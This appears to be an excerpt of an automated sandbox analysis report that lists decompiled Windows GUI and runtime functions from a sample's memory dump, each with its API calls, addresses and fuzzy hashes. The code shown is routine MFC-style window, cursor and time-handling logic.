MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,?,00000000,?,0040A577), ref: 0040BFBA
CompareStringW.KERNEL32(?,?,00000000,00000000,?,00000000,?,00000000,?,0040A577), ref: 0040BFD2

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ByteCharMultiWide$CompareString
String ID:
API String ID: 376665442-0
Opcode ID: 457da201d333a445e7be22f73c5e8df3eb2b5babfed425308593c8da7e39ea65
Instruction ID: 5efc645efc17fcc534c18c6f6ed6037a474d66dfe24f988aec16bcf1503d57bf
Opcode Fuzzy Hash: 457da201d333a445e7be22f73c5e8df3eb2b5babfed425308593c8da7e39ea65
Instruction Fuzzy Hash: 3621FA3290021AEBCF218F84CD459DE7FB6FB48750F10416AFA11B21A0C3359962DB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041837E, Relevance: 6.1, APIs: 4, Instructions: 66
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041837E(intOrPtr _a4, struct _FILETIME* _a8) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				int _t36;
				void* _t50;

				_t47 = _a4;
				_v28.wYear =  *((intOrPtr*)(E00410A6D(_a4, 0, 0) + 0x14)) + 0x76c;
				_v28.wMonth =  *((intOrPtr*)(E00410A6D(_t47, 0, 0) + 0x10)) + 1;
				_v28.wDay =  *((intOrPtr*)(E00410A6D(_t47, 0, 0) + 0xc));
				_v28.wHour =  *((intOrPtr*)(E00410A6D(_t47, 0, 0) + 8));
				_v28.wMinute =  *((intOrPtr*)(E00410A6D(_t47, 0, 0) + 4));
				_t30 = E00410A6D(_t47, 0, 0);
				_v28.wMilliseconds = 0;
				_v28.wSecond =  *_t30;
				if(SystemTimeToFileTime( &_v28,  &_v12) == 0) {
					E00417D15(_t50, GetLastError(), 0);
				}
				_t36 = LocalFileTimeToFileTime( &_v12, _a8);
				if(_t36 == 0) {
					return E00417D15(_t50, GetLastError(), 0);
				}
				return _t36;
			}

0x00418386
0x0041839e
0x004183ae
0x004183be
0x004183ce
0x004183de
0x004183e2
0x004183ea
0x004183ee
0x00418408
0x0041840e
0x0041840e
0x0041841a
0x00418422
0x00000000
0x00418428
0x00418430

APIs

SystemTimeToFileTime.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004183FA
GetLastError.KERNEL32(00000000), ref: 0041840B
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0041841A
GetLastError.KERNEL32(00000000), ref: 00418425

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Time$File$ErrorLast$LocalSystem
String ID:
API String ID: 1172841412-0
Opcode ID: 77e8b690d52222c06148fd2690c6150cb9e48df62c9af10ae8d967d673f72f3a
Instruction ID: 69ffd75d0e39b7352c5362a2be2b2db12d62653dc9023d602915fa8a64db73ca
Opcode Fuzzy Hash: 77e8b690d52222c06148fd2690c6150cb9e48df62c9af10ae8d967d673f72f3a
Instruction Fuzzy Hash: 2F11542AA10319A6CF00BBE698059EFB7BDEF94744B04405BF51197222EB78D6C187ED

Uniqueness

Uniqueness Score: -1.00%

Function 00427D03, Relevance: 6.1, APIs: 4, Instructions: 64
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00427D03(void* __ecx) {
				CHAR* _t35;
				void* _t40;
				CHAR* _t49;
				CHAR* _t55;
				signed int _t56;
				void* _t61;

				E00406520(E0042A190, _t61);
				_t49 =  *(_t61 + 8);
				_t55 =  *(_t61 + 0xc);
				 *(_t61 + 0xc) =  &(_t49[_t55 - 1]);
				 *((intOrPtr*)(_t61 - 0x10)) =  *((intOrPtr*)(E004126FB() + 0x1c));
				_t56 = 0 | _t55 != 0x00000001;
				_t35 =  *0x436980; // 0x436994
				 *(_t61 + 8) = _t35;
				 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
				if(E004172BF(_t61 + 8,  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x114)) + 0x1c)), _t56, 0xa) != 0) {
					if(_t56 != 0) {
						wsprintfA(_t61 - 0x60,  *(_t61 + 8), _t49,  *(_t61 + 0xc));
					} else {
						wsprintfA(_t61 - 0x60,  *(_t61 + 8), _t49);
					}
					SendMessageA( *( *((intOrPtr*)(_t61 - 0x10)) + 0x1c), 0x362, 0, _t61 - 0x60);
				}
				 *(_t61 - 4) =  *(_t61 - 4) | 0xffffffff;
				_t40 = E00416AEC(_t61 + 8);
				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
				return _t40;
			}

0x00427d08
0x00427d11
0x00427d16
0x00427d1f
0x00427d2a
0x00427d35
0x00427d37
0x00427d3c
0x00427d45
0x00427d5b
0x00427d5f
0x00427d7f
0x00427d61
0x00427d69
0x00427d6f
0x00427d99
0x00427d99
0x00427d9f
0x00427da6
0x00427db1
0x00427db9

APIs

__EH_prolog.LIBCMT ref: 00427D08

Part of subcall function 004172BF: lstrlenA.KERNEL32(?), ref: 00417303

wsprintfA.USER32 ref: 00427D69
wsprintfA.USER32 ref: 00427D7F
SendMessageA.USER32(?,00000362,00000000,?), ref: 00427D99

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: wsprintf$H_prologMessageSendlstrlen
String ID:
API String ID: 443212507-0
Opcode ID: 7f582531f965cc17da0ee5c9b4071f69e8f9433dc37d9febc509c367a3985e73
Instruction ID: 7ff1a3cc2775f07db174e29478699fd29c516c00f85defca4782343cc9fd23cc
Opcode Fuzzy Hash: 7f582531f965cc17da0ee5c9b4071f69e8f9433dc37d9febc509c367a3985e73
Instruction Fuzzy Hash: 75214D76A00208ABCB11DFA8DC85ADEB7B9FF08354F018126F919DB251E734DA15CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0041F9E4, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041F9E4(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				int _t21;
				intOrPtr _t32;
				int _t36;
				void* _t46;

				_push(__ecx);
				_push(__ecx);
				_t46 = __ecx;
				_t36 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t21 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_v8 = _t21;
				OffsetRect(__ecx + 0x28, _t36, _t21);
				OffsetRect(_t46 + 0x48, _t36, _v8);
				OffsetRect(_t46 + 0x38, _t36, _v8);
				OffsetRect(_t46 + 0x58, _t36, _v8);
				_t48 =  *((intOrPtr*)(_t46 + 0x80));
				 *((intOrPtr*)(_t46 + 4)) = _a4;
				 *((intOrPtr*)(_t46 + 8)) = _a8;
				if( *((intOrPtr*)(_t46 + 0x80)) == 0) {
					_t32 = E004201E2();
				} else {
					_t32 = 0;
				}
				 *((intOrPtr*)(_t46 + 0x74)) = _t32;
				return E0042007A(_t46, _t48, 0);
			}

0x0041f9e7
0x0041f9e8
0x0041f9ee
0x0041f9fd
0x0041fa02
0x0041fa04
0x0041fa0d
0x0041fa17
0x0041fa21
0x0041fa2b
0x0041fa30
0x0041fa37
0x0041fa3d
0x0041fa40
0x0041fa48
0x0041fa42
0x0041fa42
0x0041fa42
0x0041fa51
0x0041fa5d

APIs

OffsetRect.USER32(?,?,?), ref: 0041FA0D
OffsetRect.USER32(?,?,?), ref: 0041FA17
OffsetRect.USER32(?,?,?), ref: 0041FA21
OffsetRect.USER32(?,?,?), ref: 0041FA2B

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: OffsetRect
String ID:
API String ID: 177026234-0
Opcode ID: 724412e346da52ef1abd13ebb36a31384d97fecc05aac676bbc0405bf4fe35f7
Instruction ID: 12d90742d37334e6a7f33d2c848e5a22a1ecdf716f2821100b5f1ee929164941
Opcode Fuzzy Hash: 724412e346da52ef1abd13ebb36a31384d97fecc05aac676bbc0405bf4fe35f7
Instruction Fuzzy Hash: 3C113C71600609AFDB20DFAAC984D9BBBECEF44344B00482EF54AC3650D674EE408B60

Uniqueness

Uniqueness Score: -1.00%

Function 00422C42, Relevance: 6.1, APIs: 4, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00422C42(void* __ecx) {
				void* __ebp;
				void* _t6;
				void* _t8;
				void* _t27;
				void* _t30;
				void* _t32;

				_t32 = __ecx;
				_t6 = E004136A7(__ecx);
				if(_t6 != 0) {
					if((E00416528(_t32) & 0x00000001) != 0) {
						_t27 = E00414CEF(_t32);
						_t30 = E00413740(_t32, GetForegroundWindow());
						if(_t27 == _t30 || E00413740(_t32, GetLastActivePopup( *(_t27 + 0x1c))) == _t30 && SendMessageA( *(_t30 + 0x1c), 0x36d, 0x40, 0) != 0) {
							_push(1);
							_pop(0);
						}
						asm("sbb eax, eax");
						SendMessageA( *(_t32 + 0x1c), 0x36d, 0xb4, 0);
					}
					_t8 = 1;
					return _t8;
				}
				return _t6;
			}

0x00422c43
0x00422c45
0x00422c4c
0x00422c58
0x00422c64
0x00422c78
0x00422c7c
0x00422ca7
0x00422ca9
0x00422ca9
0x00422cac
0x00422cbe
0x00422cc2
0x00422cc5
0x00000000
0x00422cc5
0x00422cc7

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

GetForegroundWindow.USER32 ref: 00422C66
GetLastActivePopup.USER32(?), ref: 00422C81
SendMessageA.USER32(?,0000036D,00000040,00000000), ref: 00422C9D
SendMessageA.USER32(?,0000036D,-00000007,00000000), ref: 00422CBE

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MessageSendWindow$ActiveForegroundLastLongPopup
String ID:
API String ID: 2039223353-0
Opcode ID: 045ec56b260f3de9eff23e93b67e4b6a915aff67d248da42b0d3d9ef37d763b1
Instruction ID: 235acb9714286046b2b697988b516babaf9458fdd3923160d87edcd70ef93c92
Opcode Fuzzy Hash: 045ec56b260f3de9eff23e93b67e4b6a915aff67d248da42b0d3d9ef37d763b1
Instruction Fuzzy Hash: 2301F2723403153EEB212A73FD51FAE6209AB40B55F50083ABA01DA2D1DAADDD86416C

Uniqueness

Uniqueness Score: -1.00%

Function 00417748, Relevance: 6.1, APIs: 4, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00417748(void* __ecx, void* __esi) {
				void* _v8;
				void* __ebp;
				void* _t10;
				void* _t22;
				intOrPtr* _t29;
				void* _t31;
				void* _t34;

				_t31 = __esi;
				_push(__ecx);
				_t22 = __ecx;
				if(E004131DD(0x10) == 0) {
					_t29 = 0;
				} else {
					_t29 = E004176E1(_t8, 0xffffffff);
				}
				_push(_t31);
				_t10 = GetCurrentProcess();
				if(DuplicateHandle(GetCurrentProcess(),  *(_t22 + 4), _t10,  &_v8, 0, 0, 2) == 0) {
					if(_t29 != 0) {
						 *((intOrPtr*)( *_t29 + 4))(1);
					}
					E00417D15(_t34, GetLastError(), 0);
				}
				 *((intOrPtr*)(_t29 + 4)) = _v8;
				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t22 + 8));
				return _t29;
			}

0x00417748
0x0041774b
0x0041774e
0x0041775a
0x00417769
0x0041775c
0x00417765
0x00417765
0x0041776b
0x0041777c
0x0041778e
0x00417792
0x0041779a
0x0041779a
0x004177a6
0x004177a6
0x004177ae
0x004177b4
0x004177bc

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 0041777C
GetCurrentProcess.KERNEL32(?,00000000), ref: 00417782
DuplicateHandle.KERNEL32(00000000), ref: 00417785
GetLastError.KERNEL32(00000000), ref: 0041779F

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast
String ID:
API String ID: 3907606552-0
Opcode ID: 487aebb410ded9b0ec04d8d8fea2586699d6c29f13a4c79ccff8f06708e505eb
Instruction ID: 78f57001bf266bd8873ef29effcb20f5a2db12ccf0cf7036e4147b7dfe15a156
Opcode Fuzzy Hash: 487aebb410ded9b0ec04d8d8fea2586699d6c29f13a4c79ccff8f06708e505eb
Instruction Fuzzy Hash: CC018435704304BBEB10ABA9DC49FAA7BB8DF44760F244526F915CB2D1DB64EC8087A4

Uniqueness

Uniqueness Score: -1.00%

Function 00410C4F, Relevance: 6.0, APIs: 4, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00410C4F(void* __ecx, struct tagPOINT* _a8) {
				struct tagPOINT _v12;
				struct tagPOINT* _t8;
				struct HWND__* _t9;
				int _t14;
				long _t18;
				struct HWND__* _t21;
				struct HWND__* _t22;
				struct HWND__* _t24;

				_t8 = _a8;
				_v12.x = _t8->x;
				_t18 = _t8->y;
				_push(_t18);
				_v12.y = _t18;
				_t9 = WindowFromPoint( *_t8);
				_t24 = _t9;
				if(_t24 != 0) {
					_t21 = GetParent(_t24);
					if(_t21 == 0 || E0041A759(_t21, 2) == 0) {
						ScreenToClient(_t24,  &_v12);
						_t22 = E0041A7CE(_t24, _v12.x, _v12.y);
						if(_t22 == 0) {
							L6:
							_t9 = _t24;
						} else {
							_t14 = IsWindowEnabled(_t22);
							_t9 = _t22;
							if(_t14 != 0) {
								goto L6;
							}
						}
					} else {
						_t9 = _t21;
					}
				}
				return _t9;
			}

0x00410c54
0x00410c5b
0x00410c5e
0x00410c61
0x00410c62
0x00410c67
0x00410c6d
0x00410c71
0x00410c7a
0x00410c7e
0x00410c95
0x00410ca7
0x00410cab
0x00410cba
0x00410cba
0x00410cad
0x00410cae
0x00410cb6
0x00410cb8
0x00000000
0x00000000
0x00410cb8
0x00410c8c
0x00410c8c
0x00410c8c
0x00410c7e
0x00410cbf

APIs

WindowFromPoint.USER32(?,?), ref: 00410C67
GetParent.USER32(00000000), ref: 00410C74
ScreenToClient.USER32 ref: 00410C95
IsWindowEnabled.USER32(00000000), ref: 00410CAE

Part of subcall function 0041A759: GetWindowLongA.USER32 ref: 0041A76A

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$ClientEnabledFromLongParentPointScreen
String ID:
API String ID: 2204725058-0
Opcode ID: 1e2d37df1472de887ddde9cf9ac6649944d58a441de37f59d3653998fea7e7e4
Instruction ID: b03e2d05c99e3754afe2f9c82b4a20bfc763fe38c38db5da76ce186bf725b679
Opcode Fuzzy Hash: 1e2d37df1472de887ddde9cf9ac6649944d58a441de37f59d3653998fea7e7e4
Instruction Fuzzy Hash: 8D01D436600614BF87169B989C44DEF7BB9EF85740B140129F905D7310EB78DD818BEC

Uniqueness

Uniqueness Score: -1.00%

Function 00426CBA, Relevance: 6.0, APIs: 4, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E00426CBA(intOrPtr __ecx, void* __eflags) {
				void* _t21;
				intOrPtr* _t32;
				struct HICON__** _t40;
				intOrPtr _t43;
				void* _t45;

				E00406520(E0042A113, _t45);
				_push(__ecx);
				_t43 = __ecx;
				 *((intOrPtr*)(_t45 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x42c9fc;
				 *(_t45 - 4) = 1;
				E00419BEE(__ecx + 0x78);
				_t39 =  *((intOrPtr*)(_t43 + 0x114));
				if( *((intOrPtr*)(_t43 + 0x114)) != 0) {
					E004288AC(_t39);
					E00413206(_t39);
				}
				E00413206( *((intOrPtr*)(_t43 + 0x88)));
				_t32 =  *((intOrPtr*)(_t43 + 0x74));
				if(_t32 != 0) {
					 *((intOrPtr*)( *_t32 + 4))(1);
				}
				_t40 = _t43 + 0x100;
				if( *(_t43 + 0x100) != 0) {
					SetCursor(LoadCursorA(0, 0x7f00));
					DestroyCursor( *_t40);
				}
				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
				E00419C1F(_t43 + 0x78);
				 *(_t45 - 4) =  *(_t45 - 4) | 0xffffffff;
				_t21 = E0041AD27(_t43);
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return _t21;
			}

0x00426cbf
0x00426cc4
0x00426cc6
0x00426cc9
0x00426ccc
0x00426cd5
0x00426cdc
0x00426ce1
0x00426ce9
0x00426ced
0x00426cf3
0x00426cf8
0x00426cff
0x00426d05
0x00426d0a
0x00426d10
0x00426d10
0x00426d1a
0x00426d20
0x00426d30
0x00426d38
0x00426d38
0x00426d3e
0x00426d45
0x00426d4a
0x00426d50
0x00426d5a
0x00426d62

APIs

__EH_prolog.LIBCMT ref: 00426CBF
LoadCursorA.USER32 ref: 00426D29
SetCursor.USER32(00000000), ref: 00426D30
DestroyCursor.USER32(00000000), ref: 00426D38

Part of subcall function 004288AC: __EH_prolog.LIBCMT ref: 004288B1
Part of subcall function 004288AC: DeleteDC.GDI32(?), ref: 004288D2

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Cursor$H_prolog$DeleteDestroyLoad
String ID:
API String ID: 2398634004-0
Opcode ID: 11ff31ac3701bcf7089a1abddc17fb2184ff4a9a02ad15d7e71b413ad67de2bd
Instruction ID: 779aaf76a531418baa36e2a5a867f58700d8f9a93bf22c0d14db93a2c62a59f0
Opcode Fuzzy Hash: 11ff31ac3701bcf7089a1abddc17fb2184ff4a9a02ad15d7e71b413ad67de2bd
Instruction Fuzzy Hash: A511E031300600DBE735AF65E806BEEBBA5EF44714F50012FE16697291CBB82981CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00414E0D, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00414E0D(struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __ebp;
				struct HWND__* _t10;
				void* _t12;
				struct HWND__* _t16;
				struct HWND__* _t17;
				void* _t18;

				_t16 = GetDlgItem(_a4, _a8);
				if(_t16 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t17 = _t10;
						if(_t17 == 0) {
							break;
						}
						_t12 = E00414E0D(_t17, _a8, _a12);
						if(_t12 == 0) {
							_t10 = GetWindow(_t17, 2);
							continue;
						}
						goto L11;
					}
					return 0;
				} else {
					if(GetTopWindow(_t16) == 0) {
						L3:
						_push(_t16);
						if(_a12 == 0) {
							return E00413740(_t18);
						}
						_t12 = E00413767();
						if(_t12 == 0) {
							goto L6;
						}
					} else {
						_t12 = E00414E0D(_t16, _a8, _a12);
						if(_t12 == 0) {
							goto L3;
						}
					}
				}
				L11:
				return _t12;
			}

0x00414e24
0x00414e28
0x00414e58
0x00414e5b
0x00414e5d
0x00414e5d
0x00414e61
0x00000000
0x00000000
0x00414e6a
0x00414e71
0x00414e76
0x00000000
0x00414e76
0x00000000
0x00414e71
0x00000000
0x00414e2a
0x00414e2f
0x00414e41
0x00414e45
0x00414e46
0x00000000
0x00414e48
0x00414e4f
0x00414e56
0x00000000
0x00000000
0x00414e31
0x00414e38
0x00414e3f
0x00000000
0x00000000
0x00414e3f
0x00414e2f
0x00414e83
0x00414e83

APIs

GetDlgItem.USER32 ref: 00414E18
GetTopWindow.USER32(00000000), ref: 00414E2B
GetTopWindow.USER32(?), ref: 00414E5B
GetWindow.USER32(00000000,00000002), ref: 00414E76

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 784f82e7734976b1dbf31960bbb8f16ae9e5790f6c6f8c00282bd4486821dd93
Instruction ID: 713c4843e211392e89bb80c14a0a22a2ce3b3a0133c9697a1d0cdd1df30717b3
Opcode Fuzzy Hash: 784f82e7734976b1dbf31960bbb8f16ae9e5790f6c6f8c00282bd4486821dd93
Instruction Fuzzy Hash: 3601DF3620031AA7CF222FA1DC04FDF3B19BF907A8B058022FD1095220D73AD99286ED

Uniqueness

Uniqueness Score: -1.00%

Function 00414E86, Relevance: 6.0, APIs: 4, Instructions: 49
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00414E86(void* __edx, struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __ebp;
				struct HWND__* _t16;
				void* _t20;
				void* _t22;
				struct HWND__* _t24;

				_t22 = __edx;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t24 = _t16;
					if(_t24 == 0) {
						break;
					}
					if(_a24 == 0) {
						SendMessageA(_t24, _a8, _a12, _a16);
					} else {
						_push(_t24);
						_t20 = E00413767();
						if(_t20 != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x1c)));
							_push(_t20);
							E0041357F(_t22);
						}
					}
					if(_a20 != 0 && GetTopWindow(_t24) != 0) {
						E00414E86(_t22, _t24, _a8, _a12, _a16, _a20, _a24);
					}
					_t16 = GetWindow(_t24, 2);
				}
				return _t16;
			}

0x00414e86
0x00414e94
0x00414e96
0x00414e96
0x00414e9a
0x00000000
0x00000000
0x00414ea0
0x00414eca
0x00414ea2
0x00414ea2
0x00414ea3
0x00414eaa
0x00414eac
0x00414eaf
0x00414eb2
0x00414eb5
0x00414eb8
0x00414eb9
0x00414eb9
0x00414eaa
0x00414ed4
0x00414eed
0x00414eed
0x00414ef5
0x00414ef5
0x00414f00

APIs

GetTopWindow.USER32(?), ref: 00414E94
SendMessageA.USER32(00000000,?,?,?), ref: 00414ECA
GetTopWindow.USER32(00000000), ref: 00414ED7
GetWindow.USER32(00000000,00000002), ref: 00414EF5

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$MessageSend
String ID:
API String ID: 1496643700-0
Opcode ID: 964e5e527de8f2c614a29ec2c7bb328b2d9dd3a836f6323a01ca71765bcf14b3
Instruction ID: 3d1463f18b92dc59c4e8e68b3c1d5ad38cebe4dbe95d796ae8901b7c7719fd47
Opcode Fuzzy Hash: 964e5e527de8f2c614a29ec2c7bb328b2d9dd3a836f6323a01ca71765bcf14b3
Instruction Fuzzy Hash: 9901E93210021ABBCF226F959C04EDF3B2ABF85395F448016FA1055161C73AD9B2EFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00412FC3, Relevance: 6.0, APIs: 4, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00412FC3(void* __ecx, void* __ebp, signed int _a4) {
				intOrPtr _t16;
				int _t17;
				void* _t20;
				struct HWND__* _t26;
				intOrPtr _t35;
				void* _t36;

				_t37 = __ebp;
				_t36 = __ecx;
				_t16 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t16 == 0) {
					if(_a4 == 0) {
						_t35 =  *((intOrPtr*)(__ecx + 0x14));
						if(GetFocus() ==  *(_t35 + 0x1c)) {
							_t20 = E00413740(__ebp, GetParent( *(_t35 + 0x1c)));
							_t26 =  *(_t36 + 0x14);
							if(_t26 != 0) {
								_t26 =  *(_t26 + 0x1c);
							}
							E004166F5(E00413740(_t37, GetNextDlgTabItem( *(_t20 + 0x1c), _t26, 0)));
						}
					}
					_t17 = E004166CE( *(_t36 + 0x14), _a4);
					L9:
					 *((intOrPtr*)(_t36 + 0x18)) = 1;
					return _t17;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) != 0) {
					return _t16;
				}
				asm("sbb ecx, ecx");
				_t17 = EnableMenuItem( *(_t16 + 4),  *(__ecx + 8), ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000004);
				goto L9;
			}

0x00412fc3
0x00412fc4
0x00412fc6
0x00412fcb
0x00412ff9
0x00412ffb
0x00413007
0x00413013
0x00413018
0x0041301d
0x0041301f
0x0041301f
0x00413036
0x00413036
0x00413007
0x00413042
0x00413048
0x00413048
0x00000000
0x00413048
0x00412fd1
0x00413050
0x00413050
0x00412fd9
0x00412feb
0x00000000

APIs

EnableMenuItem.USER32 ref: 00412FEB
GetFocus.USER32 ref: 00412FFE
GetParent.USER32(?), ref: 0041300C
GetNextDlgTabItem.USER32(?,?,00000000), ref: 00413028

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
